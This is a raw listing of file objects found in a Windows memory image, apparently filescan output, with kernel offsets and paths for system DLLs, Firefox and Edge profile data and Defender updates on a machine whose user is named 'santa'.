+0x918b76c66330	\Windows\System32\winevt\Logs\Microsoft-Windows-WorkFolders%4WHC.evtx	216
+0x918b76c664c0	\Windows\Prefetch\WUAUCLT.EXE-4A7CF88B.pf	216
+0x918b76c66650	\Users\santa\AppData\Roaming\Mozilla\Firefox\Profiles\888jya8e.default-release\places.sqlite-wal	216
+0x918b76c66970	\Windows\SysWOW64\apphelp.dll	216
+0x918b76c66b00	\$Directory	216
+0x918b76c66c90	\$Directory	216
+0x918b76c66e20	\Windows\SysWOW64\Windows.System.Diagnostics.Telemetry.PlatformTelemetryClient.dll	216
+0x918b76c67140	\Users\santa\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157	216
+0x918b76c672d0	\Windows\System32\sendmail.dll	216
+0x918b76c67460	\Windows\Registration\R000000000006.clb	216
+0x918b76c67910	\Windows\SysWOW64\wdmaud.drv	216
+0x918b76c67c30	\Program Files\WindowsApps\Microsoft.SkypeApp_15.108.3205.0_x64__kzf8qxf38zg5c\Skype\SkypeContext.dll	216
+0x918b76c680e0	\Users\santa\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749	216
+0x918b76c68270	\srvsvc	216
+0x918b76c68400	\Windows\System32\en-US\Windows.Web.dll.mui	216
+0x918b76c68590	\Windows\System32\en-US\KernelBase.dll.mui	216
+0x918b76c68720	\Windows\SysWOW64\mskeyprotect.dll	216
+0x918b76c68a40	\Windows\SoftwareDistribution\Download\Install\AM_Delta_Patch_1.401.765.0.exe	216
+0x918b76c68bd0	\ProgramData\Packages\Microsoft.SkypeApp_kzf8qxf38zg5c\S-1-5-21-1046918562-1299961717-1331875240-1001\SystemAppData\Helium\Cache\465f7e52ad88feb7_COM15.dat	216
+0x918b76c68d60	\Windows\System32\en-US\Windows.Web.dll.mui	216
+0x918b76c68ef0	\Windows\System32\utcutil.dll	216
+0x918b76c69080	\Windows\System32	216
+0x918b76c693a0	\Windows\SysWOW64\atlthunk.dll	216
+0x918b76c699e0	\Windows\SysWOW64\ksuser.dll	216
+0x918b76c69d00	\Windows\Fonts\seguiemj.ttf	216
+0x918b76c6a1b0	\gecko.4576.3988.3315572846900535200	216
+0x918b76c6a4d0	\Windows\Fonts\cambriab.ttf	216
+0x918b76c6aca0	\gecko.4576.3988.11800597154050836485	216
+0x918b771021e0	\Users\santa\AppData\Roaming\Mozilla\Firefox\Profiles\888jya8e.default-release\formhistory.sqlite	216
+0x918b77102370	\gecko.4576.3988.6592836978968939771	216
+0x918b77102500	\CMApi	216
+0x918b77102690	\Windows\System32\en-US\urlmon.dll.mui	216
+0x918b77102820	\ProgramData\Microsoft\Windows Defender\Definition Updates\{D62DB865-2BF3-4866-A4B8-E44E0FC98F75}\mpengine.dll	216
+0x918b77102b40	\gecko.4576.3988.17650197844353459366	216
+0x918b77102cd0	\Windows\System32\EhStorAPI.dll	216
+0x918b77102e60	\Program Files (x86)\Mozilla Firefox\firefox.exe	216
+0x918b77103180	\CMApi	216
+0x918b77103310	\LOCAL\cubeb-pipe-4576-6	216
+0x918b771034a0	\LOCAL\cubeb-pipe-4576-6	216
+0x918b77103630	\Program Files (x86)\Mozilla Firefox	216
+0x918b771037c0	\Windows\System32\en-US\wosc.dll.mui	216
+0x918b77103950	\Device\HarddiskVolume4\Windows\System32\config\COMPONENTS{fd9a35c3-49fe-11e9-aa2c-248a07783950}.TM	216
+0x918b77103ae0	\Windows\System32\en-US\Windows.UI.dll.mui	216
+0x918b77103c70	\Windows\System32\en-US\crypt32.dll.mui	216
+0x918b77103e00	\gecko.4576.3988.17650197844353459366	216
+0x918b77104120	\Windows\System32\usocoreworker.exe	216
+0x918b771042b0	\Program Files (x86)\Mozilla Firefox	216
+0x918b77104440	\Windows\System32\MpSigStub.exe	216
+0x918b771045d0	\gecko.4576.3988.6592836978968939771	216
+0x918b77104a80	\CMApi	216
+0x918b77104c10	\Windows	216
+0x918b77104da0	\Windows\System32\usocoreps.dll	216
+0x918b771050c0	\Windows\System32\MpSigStub.exe	216
+0x918b77105250	\Program Files\WindowsApps\Microsoft.XboxGamingOverlay_6.123.10181.0_x64__8wekyb3d8bbwe	216
+0x918b77105570	\Program Files\WindowsApps\Microsoft.XboxGamingOverlay_6.123.10181.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\S-1-5-21-1046918562-1299961717-1331875240-1001-MergedResources-1.pri	216
+0x918b77105700	\Device\HarddiskVolume4\Windows\System32\config\COMPONENTS{fd9a35c3-49fe-11e9-aa2c-248a07783950}.TM	216
+0x918b77105a20	\Windows\Fonts\times.ttf	216
+0x918b77105bb0	\Windows\System32	216
+0x918b77105d40	\CMApi	216
+0x918b77105ed0	\Program Files\WindowsApps\Microsoft.XboxGamingOverlay_6.123.10181.0_x64__8wekyb3d8bbwe\xComms.dll	216
+0x918b771061f0	\$Directory	216
+0x918b77106380	\ProgramData\USOPrivate\UpdateStore\UpdateCspStore.xml	216
+0x918b77106510	\Users\santa\AppData\Roaming\Mozilla\Firefox\Profiles\888jya8e.default-release\storage\default\https+++www.youtube.com\cache\caches.sqlite	216
+0x918b771066a0	\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.ProxyStub.dll	216
+0x918b77106830	\LOCAL\cubeb-pipe-4576-12	216
+0x918b771069c0	\Users\santa\Pictures\wallpaper.png	216
+0x918b77106ce0	\Windows\System32	216
+0x918b77106e70	\$Directory	216
+0x918b77107190	\Windows\Fonts\segoeui.ttf	216
+0x918b77107320	\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy	216
+0x918b771074b0	\Program Files\WindowsApps\Microsoft.XboxGamingOverlay_6.123.10181.0_x64__8wekyb3d8bbwe\resources.pri	216
+0x918b77107640	\$Directory	216
+0x918b771077d0	\Windows\System32\en-US\crypt32.dll.mui	216
+0x918b77107960	\Windows\System32\en-US\kernel32.dll.mui	216
+0x918b77107af0	\Windows\System32\en-US\windows.storage.dll.mui	216
+0x918b77107c80	\Windows\System32\SearchFilterHost.exe	216
+0x918b77107e10	\LOCAL\cubeb-pipe-4576-12	216
+0x918b77108130	\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157	216
+0x918b771082c0	\Program Files\WindowsApps\Microsoft.MicrosoftStickyNotes_6.0.1.0_x64__8wekyb3d8bbwe\Assets\NewNotePlaceholder-light.png	216
+0x918b77108450	\Program Files\WindowsApps\Microsoft.XboxGamingOverlay_6.123.10181.0_x64__8wekyb3d8bbwe\gamingtelemetrynuget.dll	216
+0x918b771085e0	\LOCAL\cubeb-pipe-4576-8	216
+0x918b77108900	\Windows\System32\shacctprofile.dll	216
+0x918b77108c20	\Windows\System32\en-US\bcrypt.dll.mui	216
+0x918b77108db0	\$Directory	216
+0x918b771090d0	\CMApi	216
+0x918b771093f0	\gecko.4576.3988.7272797111254493628	216
+0x918b77109580	\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe	216
+0x918b77109710	\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe	216
+0x918b771098a0	\Sessions\1\AppContainerNamedObjects\S-1-15-2-350187224-1905355452-1037786396-3028148496-2624191407-3283318427-1255436723	216
+0x918b77109a30	\Windows\Registration\R000000000006.clb	216
+0x918b77109d50	\Program Files (x86)\Mozilla Firefox	216
+0x918b77109ee0	\Program Files (x86)\Mozilla Firefox\firefox.exe	216
+0x918b7710a200	\Program Files (x86)\Mozilla Firefox	216
+0x918b7710a390	\gecko.4576.3988.7272797111254493628	216
+0x918b7710a520	\LOCAL\cubeb-pipe-4576-8	216
+0x918b7710a6b0	\$Directory	216
+0x918b7710a840	\Program Files\WindowsApps\Microsoft.MicrosoftStickyNotes_6.0.1.0_x64__8wekyb3d8bbwe\Assets\SearchPlaceholder-light.png	216
+0x918b7710a9d0	\Windows\System32\gamingtcui.dll	216
+0x918b7710ab60	\gecko.4576.3988.2835789630577416850	216
+0x918b7710acf0	\Windows\System32\config\systemprofile\AppData\Local\Microsoft\InstallService\{0EAA5A01-7A70-45D5-9133-2575E4531A76}.catalogItem	216
+0x918b7710ae80	\CMApi	216
+0x918b7710b1a0	\Users\santa\AppData\Local\Microsoft\GameDVR\KnownGameList.bin	216
+0x918b7710b330	\Windows	216
+0x918b7710b4c0	\Windows\System32\en-US\uxtheme.dll.mui	216
+0x918b7710b650	\gecko.4576.3988.2835789630577416850	216
+0x918b7710b7e0	\Windows\System32\WorkFoldersShell.dll	216
+0x918b7710b970	\Windows\System32\WaaSAssessment.dll	216
+0x918b7710bb00	\CMApi	216
+0x918b7710be20	\Program Files\WindowsApps\Microsoft.WindowsStore_12107.1001.15.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\S-1-5-21-1046918562-1299961717-1331875240-1001-MergedResources-1.pri	216
+0x918b7710c140	\Windows\apppatch\sysmain.sdb	216
+0x918b7710c460	\Windows\System32\en-US\powrprof.dll.mui	216
+0x918b7710c5f0	\Users\santa\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\dd7c3b1adb1c168b.automaticDestinations-ms	216
+0x918b7710c780	\Windows\System32\en-US\SHCore.dll.mui	216
+0x918b7710c910	\Windows\System32\en-US\ole32.dll.mui	216
+0x918b7710caa0	\MmThread	216
+0x918b7710cc30	\$Directory	216
+0x918b7710cdc0	\Windows\System32\en-US\wsock32.dll.mui	216
+0x918b7710d0e0	\Windows\System32\en-US\windows.storage.dll.mui	216
+0x918b7710d270	\Program Files\WindowsApps\Microsoft.MicrosoftStickyNotes_6.0.1.0_x64__8wekyb3d8bbwe\Assets\SignInUpsellCloud.png	216
+0x918b7710d400	\ProgramData\Microsoft\Windows Defender\Definition Updates\{D62DB865-2BF3-4866-A4B8-E44E0FC98F75}\mpasdlta.vdm	216
+0x918b7710d590	\Windows\System32\en-US\shell32.dll.mui	216
+0x918b7710d720	\CMNotify	216
+0x918b7710d8b0	\Windows\System32\en-US\ws2_32.dll.mui	216
+0x918b7710da40	\Windows\System32\en-US\shlwapi.dll.mui	216
+0x918b7710dbd0	\Windows\Temp\MpSigStub.log	216
+0x918b7710def0	\Program Files\desktop.ini	216
+0x918b7710e210	\Windows\System32\MicrosoftEdgeSH.exe	216
+0x918b7710e3a0	\$Directory	216
+0x918b7710e530	\$Directory	216
+0x918b7710e6c0	\$Directory	216
+0x918b7710e9e0	\Windows\Fonts\segoeui.ttf	216
+0x918b7710eb70	\$PrepareToShrinkFileSize	216
+0x918b7710ed00	\Windows\System32\en-US\Windows.Web.dll.mui	216
+0x918b7710ee90	\Windows\System32\en-US\DWrite.dll.mui	216
+0x918b7710f1b0	\ProgramData\Microsoft\Windows\AppRepository\Packages\Microsoft.MicrosoftEdge_44.18362.1.0_neutral__8wekyb3d8bbwe\ActivationStore.dat.LOG2	216
+0x918b7710f340	\Users\santa\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Settings\settings.dat.LOG2	216
+0x918b7710f4d0	\Windows\System32\ProductEnumerator.dll	216
+0x918b7710f660	\Windows\System32\browser_broker.exe	216
+0x918b7710f7f0	\Windows\Registration\R000000000006.clb	216
+0x918b7710f980	\Users\santa\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\User\Default\Recovery\Active\RecoveryStore.{08A1B7B6-8720-45C7-9F53-5DE13131642A}.dat	216
+0x918b7710fb10	\$ConvertToNonresident	216
+0x918b7710fca0	\Users\santa\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\User\Default\Recovery\Active\{9FE582AC-0714-46BC-86A5-97F8760585AD}.dat	216
+0x918b7710fe30	\Users\santa\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\Temp\~DF01C4B692F42374F5.TMP	216
+0x918b77110150	\Users\santa\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Settings\settings.dat	216
+0x918b771102e0	\Users\santa\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Settings\settings.dat.LOG1	216
+0x918b77110470	\Windows\Prefetch\RUNTIMEBROKER.EXE-0F75CE2A.pf	216
+0x918b77110600	\Windows\Prefetch\SEARCHFILTERHOST.EXE-10E4267C.pf	216
+0x918b77110790	\Users\santa\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\Temp\~DFF9459C1E5AD81E6B.TMP	216
+0x918b77110ab0	\Users\santa\AppData\Roaming\Microsoft\Windows\Recent\ms-gamingoverlay--kglcheck-.lnk	216
+0x918b77110c40	\Users\santa\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\User\Default\DataStore\Data\nouser1\120712-0049\DBStore\spartan.jfm	216
+0x918b77110dd0	\Windows\System32\RuntimeBroker.exe	216
+0x918b771110f0	\Users\santa\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\User\Default\DataStore\Data\nouser1\120712-0049\DBStore\LogFiles\edb.log	216
+0x918b77111280	\srvsvc	216
+0x918b77111410	\ProgramData\Microsoft\Windows\AppRepository\Packages\Microsoft.MicrosoftEdge_44.18362.1.0_neutral__8wekyb3d8bbwe\ActivationStore.dat.LOG1	216
+0x918b771115a0	\ProgramData\Microsoft\Windows\AppRepository\Packages\Microsoft.MicrosoftEdge_44.18362.1.0_neutral__8wekyb3d8bbwe\ActivationStore.dat	216
+0x918b77111730	\Windows\System32	216
+0x918b771118c0	\Sessions\0\AppContainerNamedObjects\S-1-15-2-325582940-1778951665-2213520192-4268324128-1481672235-1589908001-3634219278	216
+0x918b77111be0	\Users\santa\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\User\Default\DataStore\Data\nouser1\120712-0049\DBStore\spartan.edb	216
+0x918b77111d70	\Windows\System32\Microsoft\Protect\S-1-5-18\Preferred	216
+0x918b77112090	\Windows\WinSxS\Manifests	216
+0x918b77112220	\Windows\Registration\R000000000006.clb	216
+0x918b77112540	\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.18362.30_none_788560eb0ef1f3b0\msdelta.dll	216
+0x918b771126d0	\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe	216
+0x918b77112860	\Windows\System32\en-US\sppc.dll.mui	216
+0x918b771129f0	\Users\santa\Pictures\desktop.ini	216
+0x918b77112b80	\$Directory	216
+0x918b77112d10	\Endpoint	216
+0x918b77112ea0	\Sessions\0\AppContainerNamedObjects\S-1-15-2-3849594370-768312209-1569529313-3852718675-3346578718-723854219-830068492	216
+0x918b771134e0	\Windows\System32\en-US\webauthn.dll.mui	216
+0x918b77113800	\Windows\System32\en-US\KernelBase.dll.mui	216
+0x918b77113990	\Windows\System32\en-US\propsys.dll.mui	216
+0x918b77113cb0	\Windows\System32\en-US\winmm.dll.mui	216
+0x918b77113e40	\$PrepareToShrinkFileSize	216
+0x918b77114160	\Windows\System32	216
+0x918b771142f0	\Windows\System32\MicrosoftEdgeCP.exe	216
+0x918b77114610	\Program Files\WindowsApps\Microsoft.XboxGamingOverlay_6.123.10181.0_x64__8wekyb3d8bbwe\GameBarFTServer.exe	216
+0x918b771147a0	\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe	216
+0x918b77114930	\Users\santa\Music\desktop.ini	216
+0x918b77114c50	\$ConvertToNonresident	216
+0x918b77114de0	\Windows\System32\en-US\edgehtml.dll.mui	216
+0x918b77115100	\Windows\System32\en-US\windows.storage.dll.mui	216
+0x918b77115290	\ProgramData\Microsoft\Windows\AppRepository\StateRepository-Deployment.srd	216
+0x918b77115420	\ProgramData\Microsoft\Windows\AppRepository\StateRepository-Deployment.srd-shm	216
+0x918b771155b0	\Windows\System32\en-US\crypt32.dll.mui	216
+0x918b77115740	\ProgramData\Microsoft\Windows\AppRepository\StateRepository-Machine.srd	216
+0x918b771158d0	\Windows\System32\en-US\dnsapi.dll.mui	216
+0x918b77115bf0	\Windows\System32\en-US\mssvp.dll.mui	216
+0x918b77115d80	\Windows\System32\en-US\combase.dll.mui	216
+0x918b771160a0	\Windows\WinSxS	216
+0x918b77116230	\Windows\WinSxS\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.18362.30_none_210ac8966535eaa7	216
+0x918b771163c0	\srvsvc	216
+0x918b77116550	\Windows\System32\WinMetadata\Windows.UI.winmd	216
+0x918b771166e0	\Windows\System32\bcastdvr.proxy.dll	216
+0x918b77116870	\Windows\System32\Windows.WARP.JITService.exe	216
+0x918b77116a00	\CMApi	216
+0x918b77116b90	\Program Files\Windows Defender\EppManifest.dll	216
+0x918b77116d20	\Windows\System32	216
+0x918b77116eb0	\Users\santa\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751	216
+0x918b771171d0	\Windows\SoftwareDistribution\Download\Install	216
+0x918b771174f0	\Users\santa\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\9d1f905ce5044aee.customDestinations-ms	216
+0x918b77117680	\Windows\System32\en-US\mswsock.dll.mui	216
+0x918b77117810	\ProgramData\Microsoft\Windows\AppRepository\StateRepository-Deployment.srd-wal	216
+0x918b77117b30	\Windows\System32\en-US\KernelBase.dll.mui	216
+0x918b77117cc0	\Windows\System32\WinMetadata\Windows.Foundation.winmd	216
+0x918b77117e50	\Windows\System32\Windows.WARP.JITService.exe	216
+0x918b77118170	\Users\santa\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506	216
+0x918b77118300	\Users\santa\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749	216
+0x918b77118490	\Users\santa\Videos\desktop.ini	216
+0x918b77118620	\Windows\System32\config\systemprofile\AppData\Local\Microsoft\InstallService\{1461CFEB-1E32-498E-AE2F-9F1708E96109}.catalogItem	216
+0x918b771187b0	\Windows\System32\config\systemprofile\AppData\Local\Microsoft\InstallService\{1CC81610-AA56-4B6A-AA79-9D585390D374}.catalogItem	216
+0x918b77118940	\Users\santa\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\MetaData\80237EE4964FC9C409AAF55BF996A292_C5130A0BDC8C859A2757D77746C10868	216
+0x918b77118ad0	\Windows\System32\config\systemprofile\AppData\Local\Microsoft\InstallService\{2152CE6B-9B4A-4AFF-9B49-FC05B8C26179}.catalogItem	216
+0x918b77118df0	\Windows\System32\en-US\KernelBase.dll.mui	216
+0x918b77119110	\Windows\Prefetch\DLLHOST.EXE-38926D07.pf	216
+0x918b771192a0	\ProgramData\Microsoft\Windows\AppRepository\Packages\windows.immersivecontrolpanel_10.0.2.1000_neutral_neutral_cw5n1h2txyewy\S-1-5-21-1046918562-1299961717-1331875240-1001.pckgdep	216
+0x918b77119430	\Users\santa\Downloads\desktop.ini	216
+0x918b771195c0	\Windows\System32\en-US\combase.dll.mui	216
+0x918b771198e0	\Windows\System32\WinMetadata\Windows.Foundation.winmd	216
+0x918b77119a70	\$Directory	216
+0x918b77119c00	\Program Files\WindowsApps\Microsoft.XboxGamingOverlay_6.123.10181.0_x64__8wekyb3d8bbwe\XboxGameBarFT.winmd	216
+0x918b77119d90	\LOCAL\cubeb-pipe-4576-9	216
+0x918b7711a240	\Endpoint	216
+0x918b7711a3d0	\Windows\System32\en-US\KernelBase.dll.mui	216
+0x918b7711a560	\Users\santa\OneDrive\desktop.ini	216
+0x918b7711a6f0	\CMNotify	216
+0x918b7711a880	\$ConvertToNonresident	216
+0x918b7711aba0	\Users\santa\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\5f7b5f1e01b83767.automaticDestinations-ms	216
+0x918b7711ad30	\Users\santa\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157	216
+0x918b7711aec0	\Windows\System32\XblAuthTokenBrokerExt.dll	216
+0x918b7711b1e0	\Windows\System32\sfc.dll	216
+0x918b7711b500	\$Directory	216
+0x918b7711b690	\Windows\System32\XblAuthManager.dll	216
+0x918b7711b9b0	\Windows\System32\en-US\combase.dll.mui	216
+0x918b7711bcd0	\CMApi	216
+0x918b7711be60	\Program Files\WindowsApps\Microsoft.XboxGamingOverlay_6.123.10181.0_x64__8wekyb3d8bbwe\Assets\XboxFluentGB.ttf	216
+0x918b7711c180	\$Directory	216
+0x918b7711c4a0	\Windows\System32\en-US\mswsock.dll.mui	216
+0x918b7711c630	\$Directory	216
+0x918b7711c7c0	\Users\santa\Pictures\cool-santa-claus.jpg	216
+0x918b7711c950	\Windows\WinSxS	216
+0x918b7711cae0	\Windows\System32\enterprisecsps.dll	216
+0x918b7711cc70	\Windows\System32\dmenterprisediagnostics.dll	216
+0x918b7711ce00	\ProgramData\Microsoft\Windows\AppRepository\Packages\Microsoft.XboxIdentityProvider_12.95.3001.0_x64__8wekyb3d8bbwe\ActivationStore.dat	216
+0x918b7711d120	\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll	216
+0x918b7711d2b0	\Users\santa\AppData\Roaming\Mozilla\Firefox\Profiles\888jya8e.default-release\datareporting\session-state.json	216
+0x918b7711d440	\Windows\System32\OpcServices.dll	216
+0x918b7711d760	\Windows\WinSxS	216
+0x918b7711da80	\Windows\System32\en-US\wintypes.dll.mui	216
+0x918b7711dc10	\Windows\System32\WinMetadata\Windows.Foundation.winmd	216
+0x918b7711dda0	\Windows\System32\config\systemprofile\AppData\Local\Microsoft\InstallService\{16E27F36-0B29-4012-A7C6-BA2404F04913}.catalogItem	216
+0x918b7711e0c0	\Windows\System32\en-US\winnlsres.dll.mui	216
+0x918b7711e250	\$Directory	216
+0x918b7711e3e0	\Windows\WinSxS\Catalogs	216
+0x918b7711e570	\Windows\System32\spp\store\2.0\cache\cache.dat	216
+0x918b7711e700	\Users\santa\Documents\desktop.ini	216
+0x918b7711e890	\Users\santa\AppData\Roaming\Microsoft\Windows\Recent\ms-gamingoverlay---.lnk	216
+0x918b7711ea20	\Program Files (x86)\Mozilla Firefox	216
+0x918b7711ebb0	\ProgramData\Microsoft\Windows Defender\Definition Updates\{945087C3-DEF1-474A-A297-2929D583B4F1}\mpengine.dll	216
+0x918b7711ed40	\Windows\Prefetch\BACKGROUNDTASKHOST.EXE-3283E2F7.pf	216
+0x918b7711f1f0	\Windows\System32\WinMetadata\Windows.System.winmd	216
+0x918b7711f380	\$Directory	216
+0x918b7711f510	\$Directory	216
+0x918b7711f830	\Windows\SystemResources\Chakra.dll.mun	216
+0x918b7711f9c0	\MsFteWds	216
+0x918b7711fb50	\Windows\System32	216
+0x918b7711fce0	\Windows\System32\WinMetadata\Windows.System.winmd	216
+0x918b7711fe70	\Windows\System32\POSyncServices.dll	216
+0x918b77120190	\Windows\System32\AppXApplicabilityBlob.dll	216
+0x918b77120320	\$Directory	216
+0x918b771204b0	\Windows\System32\en-US\twinapi.appcore.dll.mui	216
+0x918b77120640	\Windows\System32\en-US\windows.storage.dll.mui	216
+0x918b771207d0	\Windows\System32\BcastDVRClient.dll	216
+0x918b77120af0	\Windows\Fonts\georgiab.ttf	216
+0x918b77120e10	\Program Files (x86)\Mozilla Firefox\browser\features\webcompat@mozilla.org.xpi	216
+0x918b77121130	\Windows\WinSxS\Manifests	216
+0x918b77121450	\Users\santa\Desktop\desktop.ini	216
+0x918b771215e0	\Windows\System32\Windows.UI.AppDefaults.dll	216
+0x918b77121770	\ProgramData\Microsoft\Windows\ClipSVC\tokens.dat	216
+0x918b77121900	\CMNotify	216
+0x918b77121a90	\Windows\System32\en-US\dnsapi.dll.mui	216
+0x918b77121c20	\Windows\System32\en-US\winnlsres.dll.mui	216
+0x918b77121db0	\Users\santa\Videos\desktop.ini	216
+0x918b771220d0	\CMNotify	216
+0x918b77122260	\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21740.0_x64__8wekyb3d8bbwe\Microsoft.Applications.Telemetry.Windows.dll	216
+0x918b771223f0	\Windows\System32\Windows.Devices.Sensors.dll	216
+0x918b77122580	\Users\santa\OneDrive\desktop.ini	216
+0x918b77122710	\Windows\System32\DefaultDeviceManager.dll	216
+0x918b771228a0	\Windows\System32\DDORes.dll	216
+0x918b77122a30	\ProgramData\Microsoft\Windows Defender\Platform\4.18.23100.2009-0\MpClient.dll	216
+0x918b77122bc0	\$Directory	216
+0x918b77122d50	\Program Files\WindowsApps\Microsoft.XboxGamingOverlay_6.123.10181.0_x64__8wekyb3d8bbwe\Assets\XboxFluentGB.ttf	216
+0x918b77122ee0	\Windows\Prefetch\TASKHOSTW.EXE-1EAF2222.pf	216
+0x918b77123200	\Windows\System32\en-US\KernelBase.dll.mui	216
+0x918b77123390	\Windows\WinSxS\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.18362.30_none_210ac8966535eaa7	216
+0x918b77123520	\Program Files (x86)\Mozilla Firefox\vcruntime140.dll	216
+0x918b771236b0	\Windows\System32\SecurityHealthService.exe	216
+0x918b77123840	\Windows\System32\Windows.Networking.BackgroundTransfer.dll	216
+0x918b771239d0	\Users\santa\Downloads\desktop.ini	216
+0x918b77123b60	\Program Files (x86)\Mozilla Firefox\msvcp140.dll	216
+0x918b77123cf0	\Windows\System32\en-US\windows.storage.dll.mui	216
+0x918b77123e80	\Users\santa\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\1b4dd67f29cb1962.automaticDestinations-ms	216
+0x918b771241a0	\Users\santa\Music\desktop.ini	216
+0x918b77124330	\$Directory	216
+0x918b77124650	\ProgramData\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\updates\E7CF176E110C211B	216
+0x918b77124970	\Windows\System32\en-US\mswsock.dll.mui	216
+0x918b77124b00	\Users\santa\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\AC\Microsoft\CryptnetUrlCache\MetaData\EAF8AA29A62AB29E614331747385D816_5566971F87EDB16B411A38E82A858AAE	216
+0x918b77124c90	\Users\santa\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506	216
+0x918b77124e20	\$Directory	216
+0x918b77125140	\Windows\Fonts\arial.ttf	216
+0x918b771252d0	\Windows\System32\en-US\notepad.exe.mui	216
+0x918b77125460	\Windows\Fonts\StaticCache.dat	216
+0x918b771255f0	\$Directory	216
+0x918b77125780	\ProgramData\Microsoft\Windows Defender\Definition Updates\{945087C3-DEF1-474A-A297-2929D583B4F1}\mpasdlta.vdm	216
+0x918b77125aa0	\Windows\Fonts\arialbd.ttf	216
+0x918b77125c30	\Windows\Registration\R000000000006.clb	216
+0x918b77125dc0	\Program Files\WindowsApps\Microsoft.UI.Xaml.2.7_7.2208.15002.0_x64__8wekyb3d8bbwe\resources.pri	216
+0x918b771260e0	\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.18362.30_none_a1435978519dce7f	216
+0x918b77126270	\Windows\System32\en-US\dnsapi.dll.mui	216
+0x918b77126400	\Program Files\WindowsApps\Microsoft.XboxGamingOverlay_6.123.10181.0_x64__8wekyb3d8bbwe\Assets\SegXbox2.ttf	216
+0x918b77126590	\Users\santa\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\AC\Microsoft\CryptnetUrlCache\Content\EAF8AA29A62AB29E614331747385D816_5566971F87EDB16B411A38E82A858AAE	216
+0x918b77126720	\Users\santa\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751	216
+0x918b771268b0	\Program Files\WindowsApps\Microsoft.SkypeApp_15.108.3205.0_x64__kzf8qxf38zg5c\Skype\vcruntime140.dll	216
+0x918b77126bd0	\Windows\System32\en-US\taskhostw.exe.mui	216
+0x918b77126ef0	\$Directory	216
+0x918b77127080	\Windows\System32\en-US\KernelBase.dll.mui	216
+0x918b77127210	\Users\santa\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db	216
+0x918b771273a0	\Windows\SystemResources\notepad.exe.mun	216
+0x918b77127530	\CMApi	216
+0x918b77127850	\Program Files\WindowsApps\Microsoft.XboxGamingOverlay_6.123.10181.0_x64__8wekyb3d8bbwe\Assets\SegXboxGB.ttf	216
+0x918b771279e0	\Windows\System32\Unistore.dll	216
+0x918b77127b70	\Windows\WinSxS\Manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.18362.30_none_a1435978519dce7f.manifest	216
+0x918b77127d00	\Windows\System32\PimIndexMaintenance.dll	216
+0x918b77127e90	\Windows\System32\WinSync.dll	216
+0x918b771281b0	\Windows\SysWOW64\dllhost.exe	216
+0x918b77128340	\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21740.0_x64__8wekyb3d8bbwe\HxOutlookBackground.dll	216
+0x918b771284d0	\$Directory	216
+0x918b77128660	\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21740.0_x64__8wekyb3d8bbwe\HxComm.dll	216
+0x918b771287f0	\Windows\System32\en-US\KernelBase.dll.mui	216
+0x918b77128980	\ProgramData\Microsoft\Windows Defender\Definition Updates\{945087C3-DEF1-474A-A297-2929D583B4F1}\mpavdlta.vdm	216
